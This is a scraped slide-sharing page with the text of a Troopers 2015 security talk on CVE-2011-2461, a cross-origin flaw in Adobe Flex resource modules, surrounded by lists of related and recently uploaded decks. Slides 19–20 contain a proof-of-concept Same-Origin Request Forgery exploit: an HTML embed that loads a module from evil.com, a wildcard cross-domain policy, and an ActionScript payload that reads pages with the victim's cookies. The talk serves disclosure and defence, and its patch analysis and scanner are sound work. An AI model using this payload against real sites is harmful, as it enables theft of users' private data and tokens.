VoxxedDays Luxembourg - Abuse web browsers for fun & profits - Dominique Righ...VoxxedDays Luxembourg - Abuse web browsers for fun & profits - Dominique Righ...
VoxxedDays Luxembourg - Abuse web browsers for fun & profits - Dominique Righ...
YaJUG
 
Tracking vulnerable JARs
Tracking vulnerable JARsTracking vulnerable JARs
Tracking vulnerable JARs
David Jorm
 
Android Penetration testing - Day 2
 Android Penetration testing - Day 2 Android Penetration testing - Day 2
Android Penetration testing - Day 2
Mohammed Adam
 
Hacking Samsung's Tizen: The OS of Everything - Hack In the Box 2015
Hacking Samsung's Tizen: The OS of Everything - Hack In the Box 2015Hacking Samsung's Tizen: The OS of Everything - Hack In the Box 2015
Hacking Samsung's Tizen: The OS of Everything - Hack In the Box 2015
Ajin Abraham
 
iOS Application Security
iOS Application SecurityiOS Application Security
iOS Application Security
Egor Tolstoy
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Divyanshu
 
Microservices and containers for the unitiated
Microservices and containers for the unitiatedMicroservices and containers for the unitiated
Microservices and containers for the unitiated
Kevin Lee
 

Similar to The old is new, again. CVE-2011-2461 is back! (20)

Apache cordova
Apache cordovaApache cordova
Apache cordova
 
iOS Application Penetration Testing for Beginners
iOS Application Penetration Testing for BeginnersiOS Application Penetration Testing for Beginners
iOS Application Penetration Testing for Beginners
 
Native apps in html5 with chrome packaged apps
Native apps in html5 with chrome packaged appsNative apps in html5 with chrome packaged apps
Native apps in html5 with chrome packaged apps
 
Wonderful World of Maven
Wonderful World of MavenWonderful World of Maven
Wonderful World of Maven
 
MSHTMHell.pptx
MSHTMHell.pptxMSHTMHell.pptx
MSHTMHell.pptx
 
Vulnex app secusa2013
Vulnex app secusa2013Vulnex app secusa2013
Vulnex app secusa2013
 
The State of the Veil Framework
The State of the Veil FrameworkThe State of the Veil Framework
The State of the Veil Framework
 
Hacking The World With Flash
Hacking The World With FlashHacking The World With Flash
Hacking The World With Flash
 
What is the Secure Supply Chain and the Current State of the PHP Ecosystem
What is the Secure Supply Chain and the Current State of the PHP EcosystemWhat is the Secure Supply Chain and the Current State of the PHP Ecosystem
What is the Secure Supply Chain and the Current State of the PHP Ecosystem
 
[2015/2016] Apache Cordova
[2015/2016] Apache Cordova[2015/2016] Apache Cordova
[2015/2016] Apache Cordova
 
Reversing & malware analysis training part 10 exploit development basics
Reversing & malware analysis training part 10   exploit development basicsReversing & malware analysis training part 10   exploit development basics
Reversing & malware analysis training part 10 exploit development basics
 
Client side attacks using PowerShell
Client side attacks using PowerShellClient side attacks using PowerShell
Client side attacks using PowerShell
 
Cross Domain Hijacking - File Upload Vulnerability
Cross Domain Hijacking - File Upload VulnerabilityCross Domain Hijacking - File Upload Vulnerability
Cross Domain Hijacking - File Upload Vulnerability
 
VoxxedDays Luxembourg - Abuse web browsers for fun & profits - Dominique Righ...
VoxxedDays Luxembourg - Abuse web browsers for fun & profits - Dominique Righ...VoxxedDays Luxembourg - Abuse web browsers for fun & profits - Dominique Righ...
VoxxedDays Luxembourg - Abuse web browsers for fun & profits - Dominique Righ...
 
Tracking vulnerable JARs
Tracking vulnerable JARsTracking vulnerable JARs
Tracking vulnerable JARs
 
Android Penetration testing - Day 2
 Android Penetration testing - Day 2 Android Penetration testing - Day 2
Android Penetration testing - Day 2
 
Hacking Samsung's Tizen: The OS of Everything - Hack In the Box 2015
Hacking Samsung's Tizen: The OS of Everything - Hack In the Box 2015Hacking Samsung's Tizen: The OS of Everything - Hack In the Box 2015
Hacking Samsung's Tizen: The OS of Everything - Hack In the Box 2015
 
iOS Application Security
iOS Application SecurityiOS Application Security
iOS Application Security
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
 
Microservices and containers for the unitiated
Microservices and containers for the unitiatedMicroservices and containers for the unitiated
Microservices and containers for the unitiated
 

Recently uploaded

Power Electronics- AC -AC Converters.pptx
Power Electronics- AC -AC Converters.pptxPower Electronics- AC -AC Converters.pptx
Power Electronics- AC -AC Converters.pptx
Poornima D
 
一比一原版(CalArts毕业证)加利福尼亚艺术学院毕业证如何办理
一比一原版(CalArts毕业证)加利福尼亚艺术学院毕业证如何办理一比一原版(CalArts毕业证)加利福尼亚艺术学院毕业证如何办理
一比一原版(CalArts毕业证)加利福尼亚艺术学院毕业证如何办理
ecqow
 
一比一原版(爱大毕业证书)爱荷华大学毕业证如何办理
一比一原版(爱大毕业证书)爱荷华大学毕业证如何办理一比一原版(爱大毕业证书)爱荷华大学毕业证如何办理
一比一原版(爱大毕业证书)爱荷华大学毕业证如何办理
nedcocy
 
SCALING OF MOS CIRCUITS m .pptx
SCALING OF MOS CIRCUITS m                 .pptxSCALING OF MOS CIRCUITS m                 .pptx
SCALING OF MOS CIRCUITS m .pptx
harshapolam10
 
Impartiality as per ISO /IEC 17025:2017 Standard
Impartiality as per ISO /IEC 17025:2017 StandardImpartiality as per ISO /IEC 17025:2017 Standard
Impartiality as per ISO /IEC 17025:2017 Standard
MuhammadJazib15
 
SENTIMENT ANALYSIS ON PPT AND Project template_.pptx
SENTIMENT ANALYSIS ON PPT AND Project template_.pptxSENTIMENT ANALYSIS ON PPT AND Project template_.pptx
SENTIMENT ANALYSIS ON PPT AND Project template_.pptx
b0754201
 
Assistant Engineer (Chemical) Interview Questions.pdf
Assistant Engineer (Chemical) Interview Questions.pdfAssistant Engineer (Chemical) Interview Questions.pdf
Assistant Engineer (Chemical) Interview Questions.pdf
Seetal Daas
 
Unit -II Spectroscopy - EC I B.Tech.pdf
Unit -II Spectroscopy - EC  I B.Tech.pdfUnit -II Spectroscopy - EC  I B.Tech.pdf
Unit -II Spectroscopy - EC I B.Tech.pdf
TeluguBadi
 
Accident detection system project report.pdf
Accident detection system project report.pdfAccident detection system project report.pdf
Accident detection system project report.pdf
Kamal Acharya
 
This study Examines the Effectiveness of Talent Procurement through the Imple...
This study Examines the Effectiveness of Talent Procurement through the Imple...This study Examines the Effectiveness of Talent Procurement through the Imple...
This study Examines the Effectiveness of Talent Procurement through the Imple...
DharmaBanothu
 
一比一原版(uofo毕业证书)美国俄勒冈大学毕业证如何办理
一比一原版(uofo毕业证书)美国俄勒冈大学毕业证如何办理一比一原版(uofo毕业证书)美国俄勒冈大学毕业证如何办理
一比一原版(uofo毕业证书)美国俄勒冈大学毕业证如何办理
upoux
 
5G Radio Network Througput Problem Analysis HCIA.pdf
5G Radio Network Througput Problem Analysis HCIA.pdf5G Radio Network Througput Problem Analysis HCIA.pdf
5G Radio Network Througput Problem Analysis HCIA.pdf
AlvianRamadhani5
 
Introduction to Computer Networks & OSI MODEL.ppt
Introduction to Computer Networks & OSI MODEL.pptIntroduction to Computer Networks & OSI MODEL.ppt
Introduction to Computer Networks & OSI MODEL.ppt
Dwarkadas J Sanghvi College of Engineering
 
Asymmetrical Repulsion Magnet Motor Ratio 6-7.pdf
Asymmetrical Repulsion Magnet Motor Ratio 6-7.pdfAsymmetrical Repulsion Magnet Motor Ratio 6-7.pdf
Asymmetrical Repulsion Magnet Motor Ratio 6-7.pdf
felixwold
 
A high-Speed Communication System is based on the Design of a Bi-NoC Router, ...
A high-Speed Communication System is based on the Design of a Bi-NoC Router, ...A high-Speed Communication System is based on the Design of a Bi-NoC Router, ...
A high-Speed Communication System is based on the Design of a Bi-NoC Router, ...
DharmaBanothu
 
Mechanical Engineering on AAI Summer Training Report-003.pdf
Mechanical Engineering on AAI Summer Training Report-003.pdfMechanical Engineering on AAI Summer Training Report-003.pdf
Mechanical Engineering on AAI Summer Training Report-003.pdf
21UME003TUSHARDEB
 
ITSM Integration with MuleSoft.pptx
ITSM  Integration with MuleSoft.pptxITSM  Integration with MuleSoft.pptx
ITSM Integration with MuleSoft.pptx
VANDANAMOHANGOUDA
 
UNIT 4 LINEAR INTEGRATED CIRCUITS-DIGITAL ICS
UNIT 4 LINEAR INTEGRATED CIRCUITS-DIGITAL ICSUNIT 4 LINEAR INTEGRATED CIRCUITS-DIGITAL ICS
UNIT 4 LINEAR INTEGRATED CIRCUITS-DIGITAL ICS
vmspraneeth
 
Tools & Techniques for Commissioning and Maintaining PV Systems W-Animations ...
Tools & Techniques for Commissioning and Maintaining PV Systems W-Animations ...Tools & Techniques for Commissioning and Maintaining PV Systems W-Animations ...
Tools & Techniques for Commissioning and Maintaining PV Systems W-Animations ...
Transcat
 
Transformers design and coooling methods
Transformers design and coooling methodsTransformers design and coooling methods
Transformers design and coooling methods
Roger Rozario
 

Recently uploaded (20)

Power Electronics- AC -AC Converters.pptx
Power Electronics- AC -AC Converters.pptxPower Electronics- AC -AC Converters.pptx
Power Electronics- AC -AC Converters.pptx
 
一比一原版(CalArts毕业证)加利福尼亚艺术学院毕业证如何办理
一比一原版(CalArts毕业证)加利福尼亚艺术学院毕业证如何办理一比一原版(CalArts毕业证)加利福尼亚艺术学院毕业证如何办理
一比一原版(CalArts毕业证)加利福尼亚艺术学院毕业证如何办理
 
一比一原版(爱大毕业证书)爱荷华大学毕业证如何办理
一比一原版(爱大毕业证书)爱荷华大学毕业证如何办理一比一原版(爱大毕业证书)爱荷华大学毕业证如何办理
一比一原版(爱大毕业证书)爱荷华大学毕业证如何办理
 
SCALING OF MOS CIRCUITS m .pptx
SCALING OF MOS CIRCUITS m                 .pptxSCALING OF MOS CIRCUITS m                 .pptx
SCALING OF MOS CIRCUITS m .pptx
 
Impartiality as per ISO /IEC 17025:2017 Standard
Impartiality as per ISO /IEC 17025:2017 StandardImpartiality as per ISO /IEC 17025:2017 Standard
Impartiality as per ISO /IEC 17025:2017 Standard
 
SENTIMENT ANALYSIS ON PPT AND Project template_.pptx
SENTIMENT ANALYSIS ON PPT AND Project template_.pptxSENTIMENT ANALYSIS ON PPT AND Project template_.pptx
SENTIMENT ANALYSIS ON PPT AND Project template_.pptx
 
Assistant Engineer (Chemical) Interview Questions.pdf
Assistant Engineer (Chemical) Interview Questions.pdfAssistant Engineer (Chemical) Interview Questions.pdf
Assistant Engineer (Chemical) Interview Questions.pdf
 
Unit -II Spectroscopy - EC I B.Tech.pdf
Unit -II Spectroscopy - EC  I B.Tech.pdfUnit -II Spectroscopy - EC  I B.Tech.pdf
Unit -II Spectroscopy - EC I B.Tech.pdf
 
Accident detection system project report.pdf
Accident detection system project report.pdfAccident detection system project report.pdf
Accident detection system project report.pdf
 
This study Examines the Effectiveness of Talent Procurement through the Imple...
This study Examines the Effectiveness of Talent Procurement through the Imple...This study Examines the Effectiveness of Talent Procurement through the Imple...
This study Examines the Effectiveness of Talent Procurement through the Imple...
 
一比一原版(uofo毕业证书)美国俄勒冈大学毕业证如何办理
一比一原版(uofo毕业证书)美国俄勒冈大学毕业证如何办理一比一原版(uofo毕业证书)美国俄勒冈大学毕业证如何办理
一比一原版(uofo毕业证书)美国俄勒冈大学毕业证如何办理
 
5G Radio Network Througput Problem Analysis HCIA.pdf
5G Radio Network Througput Problem Analysis HCIA.pdf5G Radio Network Througput Problem Analysis HCIA.pdf
5G Radio Network Througput Problem Analysis HCIA.pdf
 
Introduction to Computer Networks & OSI MODEL.ppt
Introduction to Computer Networks & OSI MODEL.pptIntroduction to Computer Networks & OSI MODEL.ppt
Introduction to Computer Networks & OSI MODEL.ppt
 
Asymmetrical Repulsion Magnet Motor Ratio 6-7.pdf
Asymmetrical Repulsion Magnet Motor Ratio 6-7.pdfAsymmetrical Repulsion Magnet Motor Ratio 6-7.pdf
Asymmetrical Repulsion Magnet Motor Ratio 6-7.pdf
 
A high-Speed Communication System is based on the Design of a Bi-NoC Router, ...
A high-Speed Communication System is based on the Design of a Bi-NoC Router, ...A high-Speed Communication System is based on the Design of a Bi-NoC Router, ...
A high-Speed Communication System is based on the Design of a Bi-NoC Router, ...
 
Mechanical Engineering on AAI Summer Training Report-003.pdf
Mechanical Engineering on AAI Summer Training Report-003.pdfMechanical Engineering on AAI Summer Training Report-003.pdf
Mechanical Engineering on AAI Summer Training Report-003.pdf
 
ITSM Integration with MuleSoft.pptx
ITSM  Integration with MuleSoft.pptxITSM  Integration with MuleSoft.pptx
ITSM Integration with MuleSoft.pptx
 
UNIT 4 LINEAR INTEGRATED CIRCUITS-DIGITAL ICS
UNIT 4 LINEAR INTEGRATED CIRCUITS-DIGITAL ICSUNIT 4 LINEAR INTEGRATED CIRCUITS-DIGITAL ICS
UNIT 4 LINEAR INTEGRATED CIRCUITS-DIGITAL ICS
 
Tools & Techniques for Commissioning and Maintaining PV Systems W-Animations ...
Tools & Techniques for Commissioning and Maintaining PV Systems W-Animations ...Tools & Techniques for Commissioning and Maintaining PV Systems W-Animations ...
Tools & Techniques for Commissioning and Maintaining PV Systems W-Animations ...
 
Transformers design and coooling methods
Transformers design and coooling methodsTransformers design and coooling methods
Transformers design and coooling methods
 

The old is new, again. CVE-2011-2461 is back!

  • 1. About Us The old is new, again. CVE-2011-2461 is back! Troopers 2015
  • 2. About Us Luca “ikki” Carettoni ✓ Application Security @ LinkedIn ✓ Securing the Internet, one bug at a time™ ✓ @_ikki Mauro “sneak” Gentile ✓ Application Security @ Minded Security ✓ Security Researcher ✓ MSc in Computer Engineering ✓ @sneak_
  • 3. The views and opinions expressed in this presentation are those of the authors and do not reflect the position of our employers. Also, our companies do not endorse this research …bla bla
  • 4. Agenda ■ Introduction ○ Adobe Flex Localization ○ Same-Origin Policy in Adobe plug-ins ■ Vulnerability analysis ○ Identification and Exploitation ■ Official patch analysis ○ Reversing the fix and busting the vulnerable code ○ How to defend ■ Scanning at scale ○ Identifying vulnerable SWF files ○ ParrotNG ○ Results and PoCs
  • 6. Introduction ■ Adobe Flex, read “Apache Flex” since 2011 ○ Open source SDK for developing RIAs based on Adobe Flash ○ Provides a set of tools and classes to develop interactive apps ● UI layout designed through MXML ● ActionScript for dynamic features ○ It builds SWF files ● They run in browsers with Flash plug-in enabled ● Apps follow the same security rules as “native” Flash apps, at least for content running in the browser
  • 7. Flex Localization ■ Starting from Flex v3, apps support dynamic localization ○ Approach based on properties files ● Depending on the actual localeChain, the app modifies text labels and images at run time ● Handy feature for easily localizing applications /src/locales/en_US/resources.properties app.name=Name app.surname=Surname /src/locales/it_IT/resources.properties app.name=Nome app.surname=Cognome /src/App.mxml [ . . . ] <mx:FormItem label=" {resourceManager. getString('resources','app.name')} "> <s:TextInput /> </mx:FormItem> [ . . . ]
  • 8. Flex Localization (cont’d) ■ Two possibilities to localize Flex apps: 1. Compile the localization properties files directly in your application ● The application SWF file includes both the app and the localization files 2. Compile the localization properties files separately, and let the application load them at run time ● Each properties file is built in a SWF file, called Resource Module ● The application can load the required module at run-time ● Possibility to modify text labels without recompiling the entire project
  • 9. Preloading resource modules ■ Resource pre-loading by passing FlashVars in the HTML wrapper ○ resourceModuleURLs: “A comma-separated list of URLs from which resource modules will be sequentially preloaded. Resource modules are loaded by the same class as RSLs, but are loaded after the RSLs. The URLs can be relative or absolute.” <object width="100%" height="100%" type="application/x-shockwave-flash" data="http://victim.com/App.swf"> <param name="flashvars" value=" resourceModuleURLs=English.swf "> </object>
  • 10. SOP in Adobe plug-ins ■ Flash applets have their security context derived from the origin they are loaded from ○ Same-origin interaction is allowed ● Flash movie hosted at A.com can access data on A.com ○ Cross-origin interaction is not allowed unless the receiver domain defines a cross-domain policy ● Flash movie hosted at A.com can access data hosted on B.com if and only if B defines its own crossdomain.xml file
  • 11. SOP in Adobe plug-ins (cont’d) ■ Flash applets can make HTTP requests with cookies (and retrieve responses) to the domain they are loaded from ○ Just think about Rosetta Flash: abusing JSONP handlers to “interact” with domains reflecting alphanumeric callbacks ○ As we all know, letting people upload Flash movies leads to XSS ○ Common countermeasures ● Sandbox domains ● Content-Disposition: attachment ● but still, you should take into consideration polyglots...
  • 12. What if... ■ Malicious web pages can ask Flex apps to load arbitrary resource modules ■ The resource module can be loaded from arbitrary domains as well...
  • 13. CVE-2011-2461 Adobe marked it as XSS and released a tech note to verify the vulnerability and to explain how to patch it.
  • 14. CVE-2011-2461 (cont’d) ■ Resource modules inherit the security sandbox of the caller SWF ○ External SWF file - loaded from arbitrary domains - can access data hosted on the caller domain ■ Impact ○ By asking victims to visit a malicious web page, the vulnerability allows attackers to steal victims’ data hosted on the vulnerable SWF file’s origin ○ “Indirect” SOP bypass <object width="100%" height="100%" type="application/x-shockwave-flash" data="http://victim.com/App.swf"> <param name="flashvars" value="resourceModuleURLs=http://[arbitrary_evil_domain]/module.swf "> </object>
  • 15. Exploiting CVE-2011-2461 ■ Exploitation scenarios ○ SORF: Same-Origin Request Forgery to steal anti-CSRF tokens and private data ○ UI Redressing: override text labels by importing a valid resource module, whose text is controlled by the attacker ○ XSS in older versions of Flash Player ● Logically similar to UXSS since the app itself does not need to be vulnerable to XSS ● Not possible to pass resourceModuleURLs in querystring anymore
  • 16. resourceModuleURLs as GET parameter ■ In current Flex version, resourceModuleURLs cannot be declared from the querystring ○ Security enhancement or bug? ○ “Child SWFs or modules, including resource modules, that are loaded at runtime sometimes fail to load when the SWF location is specified as a URL parameter” ● See https://helpx.adobe.com/x-productkb/multi/loading-child-swfs- runtime-sometimes.html ○ This limits significantly the impact of the vulnerability ● Unless the application uses a custom wrapper
  • 17. SORF ■ Same-Origin Request Forgery attack flow 1. The vulnerable SWF file is forced to load an external resource module which can “interact” with the domain the SWF file is loaded from - due to the vulnerability 2. The resource module performs HTTP requests to steal victim’s private data since cookies are automatically appended 3. Finally, it “sends” stolen data to the attacker’s domain
  • 18. SORF (sequence diagram) ■ Same-Origin Request Forgery
  • 19. SORF (code on the attacker’s side) <textarea id="x" style="width: 100%; height:50%"></textarea> <object width="100%" height="100%" type="application/x-shockwave-flash" data="VULNERABLE_SWF"> <param name="allowscriptaccess" value="always"> <param name="flashvars" value="resourceModuleURLs=http://evil.com/URLr.swf? url=TARGET_WEBPAGE"> </object> <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ■ http://evil.com/test.html ■ http://evil.com/crossdomain.xml VULNERABLE_SWF such as http://target.example.com/a.swf TARGET_WEBPAGE such as http://target.example.com/creditcardinformation.php
  • 20. ■ A generic payload (http://evil.com/URLr.swf) package { import flash.display.Sprite; ... public class URLr extends Sprite { public static var app : URLr; public function main():void { app = new URLr(); } public function URLr() { var url:String = root.loaderInfo.parameters.url as String; var loader:URLLoader = new URLLoader(); configureListeners(loader); var request:URLRequest = new URLRequest(url); ... private function completeHandler(event:Event):void { var loader:URLLoader = URLLoader(event.target); var res:String = escape(loader.data); ExternalInterface.call("eval", "document.getElementById('x').value='" + res + "';document. getElementById('x').value=unescape(document.getElementById('x').value)"); } } } SORF (code on the attacker’s side)
  • 21. About Us DEMO 1 Exploiting CVE-2011-2461
  • 22. Analysing the patch “It’s necessary to patch the applications to protect user data.”
  • 23. Analysing the patch (cont’d) ■ Anything unusual? ○ Well, the patch does not affect the Adobe Flash Player but the Flex framework modules ○ Therefore developers are asked to patch their apps or recompile them through a non-vulnerable version of the Flex SDK ■ Adobe provided a reliable tool for identifying whether SWF files are vulnerable or not ○ It is able to patch compiled applications w/o recompiling ○ Very useful, also in the case of missing sources
  • 24. Testing patched applications ■ After the patch, resource modules do not inherit the embedding SWF’s origin anymore ○ Resource modules can be loaded exclusively from the same- origin ○ Although this may look very clear at this point, we needed to reverse the patch to make sure we really got the point ○ During our preliminary analysis, we noticed some inconsistencies: ■ i.e. some apps were correctly loading x-domain SWF modules, whereas some others were not
  • 25. Busting the vulnerable code ■ Adopted methodology 1. We took two versions of the same Flex application sample The first one vulnerable, whereas the second one patched by the Adobe patch tool. 2. We decompiled the two samples and diffed them 3. Analyzing the code diff we were able to understand both the vulnerable ActionScript code and the patch ■ In the end, we proved that our hypothesis regarding security sandbox inheritance was indeed correct
  • 26. Vulnerable vs patched Vulnerable SWF class ModuleInfo public function load(applicationDomain: ApplicationDomain = null, securityDomain:SecurityDomain = null) : void { if(_loaded) { return; } _loaded = true; limbo = null; if(_url.indexOf("published://") == 0) { return; } var r:URLRequest = new URLRequest(_url); var c:LoaderContext = new LoaderContext(); c.applicationDomain = applicationDomain? applicationDomain:new ApplicationDomain(ApplicationDomain. currentDomain); c.securityDomain = securityDomain; if(securityDomain == null && Security. sandboxType == Security.REMOTE) { c.securityDomain = SecurityDomain. currentDomain; } loader = new Loader(); Patched SWF class ModuleInfo public function load(applicationDomain: ApplicationDomain = null, securityDomain:SecurityDomain = null) : void { if(_loaded) { return; } _loaded = true; limbo = null; if(_url.indexOf("published://") == 0) { return; } var r:URLRequest = new URLRequest(_url); var c:LoaderContext = new LoaderContext(); c.applicationDomain = applicationDomain? applicationDomain:new ApplicationDomain(ApplicationDomain. currentDomain); c.securityDomain = securityDomain; if(securityDomain == null && false == true) { c.securityDomain = SecurityDomain. currentDomain; } loader = new Loader();
  • 27. How to protect ■ Three options: 1. Recompile vulnerable SWF files with the latest Apache Flex SDK, including static libraries 2. Patch them with the official Adobe patch tool, as illustrated in the official Tech Note. This seems to be sufficiently reliable, at least in our experience 3. Delete them, if not used anymore Bonus suggestion: 1. Use strict cross-domain policy files 2. Do not relax it!
  • 28. Recap ■ We had a cool bug, but it turned out to be a 1-day ■ CVE-2011-2461 was patched in the Flex SDK ○ Vulnerable SWF files can still be exploited in fully patched web browsers with the latest Flash plug-in ■ No technical details about exploitation were published ■ Successful exploits would lead to indirect SOP bypass, data stealing and actions forging
  • 29. So, what’s next? Any chance to catch vulnerable real-world Flex applications after 4 years?
  • 30. Automating vulnerability detection 1. Identify vulnerable SWF files in a programmatic fashion 2. Build a tool a. ParrotNG 3. Scan the Internet a. Find Subdomains + Your Favourite Search Engine + Selenium + ParrotNG b. Repeat (3a) with multiple computers and wait
  • 31. ABC Inspection 1. Identify a heuristic to distinguish whether a given SWF file is vulnerable or not a. Flex applications only b. Empirically conducted by comparing different versions of the same Flex application sample and focusing on the ModuleInfo:::load method c. Identified patterns in the ActionScript Bytecode (ABC) to uncover the vulnerability
  • 32. ParrotNG ■ Automatic tool to identify vulnerable SWF files ○ Written in Java ○ One JAR, Two flavors ● Command line utility ● Burp Pro Passive Scanner plugin ○ It uses swfdump - a tool included in Flex framework - for disassembling SWF files ○ Open-source ○ Download the src from https://github.com/ikkisoft/ParrotNG
  • 36. ParrotNG at scale ● Between October and December 2014, we scanned a few interesting domains for detecting vulnerable SWF files: ○ Top 50 Alexa ○ Adobe.com ○ Sites with bug bounty programs ● We broke the Internet with a four years old vulnerability that was never fully understood, and never surfaced ...and many others *All trademarks and logos belong to their respective owners
  • 38. Coordinated responsible disclosure ■ We reported the vulnerability to many high-profile security teams ○ Providing specific PoCs, ParrotNG, and a PDF with the research ■ Parties were informed on a potential disclosure date ○ Based on their feedback, we identified an appropriate disclosure date ■ There are still many more websites that are hosting vulnerable SWF files ○ Troopers is about making the world a safer place ○ We need your help and be ethical!
  • 40. References Localization in Flex - Part 1: Compiling resources into an application - Adobe http://www.adobe.com/devnet/flex/articles/flex_localization_pt1.html Localization in Flex - Part 2: Loading resources at runtime - Adobe http://www.adobe.com/devnet/flex/articles/flex-localization-pt2.html Using resource modules - Adobe http://help.adobe.com/en_US/Flex/4.0/UsingSDK/WS2db454920e96a9e51e63e3d11c0bf69084- 7f3c.html Same-origin Policy for Flash (Browser Security Handbook - part 2) - Michal Zalewski https://code.google.com/p/browsersec/wiki/Part2#Same-origin_policy_for_Flash The Tangled Web - Michal Zalewski http://lcamtuf.coredump.cx/tangled/ Flash content and the same-origin policy - Peleus Uhley http://blogs.adobe.com/security/2009/11/flash_content_and_the_same-ori.html Same Origin Policy Weaknesses - kuza55 http://www.slideshare.net/kuza55/same-origin-policy-weaknesses-1728474
  • 41. Testing Flash Applications - Stefano Di Paola http://www.wisec.it/en/Docs/flash_App_testing_Owasp07.pdf Loading child SWFs at runtime sometimes fails - Adobe https://helpx.adobe.com/x-productkb/multi/loading-child-swfs-runtime-sometimes.html HTTP: Adobe Flash Player resourceModuleURLs signature - Juniper Networks http://signatures.juniper.net/documentation/signatures/HTTP%3ASTC%3ASWF% 3ARESOURCEMODULEURLS.html Security update available for Flex SDK - Adobe https://www.adobe.com/support/security/bulletins/apsb11-25.html Flex Security Issue APSB11-25 - Adobe https://helpx.adobe.com/flash-builder/kb/flex-security-issue-apsb11-25.html Polyglot payloads in practice - Mathias Karlsson http://www.slideshare.net/MathiasKarlsson2/polyglot-payloads-in-practice-by-avlidienbrunn-at- hackpra References
  • 42. Crossing Origins by Crossing Formats - Jonas Magazinius, Andrei Sabelfeld, Billy K. Rios https://www.owasp.org/images/8/85/Crossing.Origins.by.Crossing.Formats-Jonas. Magazinius-OWASP-131010.pptx Disassembling a SWF with swfdump - Gordon Smith http://blogs.adobe.com/gosmith/2008/02/disassembling_a_swf_with_swfdu_1.html Abusing JSONP with Rosetta Flash - Michele Spagnuolo https://miki.it/blog/2014/7/8/abusing-jsonp-with-rosetta-flash/ <object> tag and Flash file executing JavaScript - HTML5 Security Cheatsheet https://html5sec.org/#79 Warning: OBJECT and EMBED are inherently unsafe - Michal Zalewski http://lcamtuf.blogspot.it/2011/03/warning-object-and-embed-are-inherently.html Origin Policy Enforcement in Modern Browsers - Frederick Braun https://frederik-braun.com/publications/thesis/Thesis- Origin_Policy_Enforcement_in_Modern_Browsers.pdf Thank you all - you made this possible! References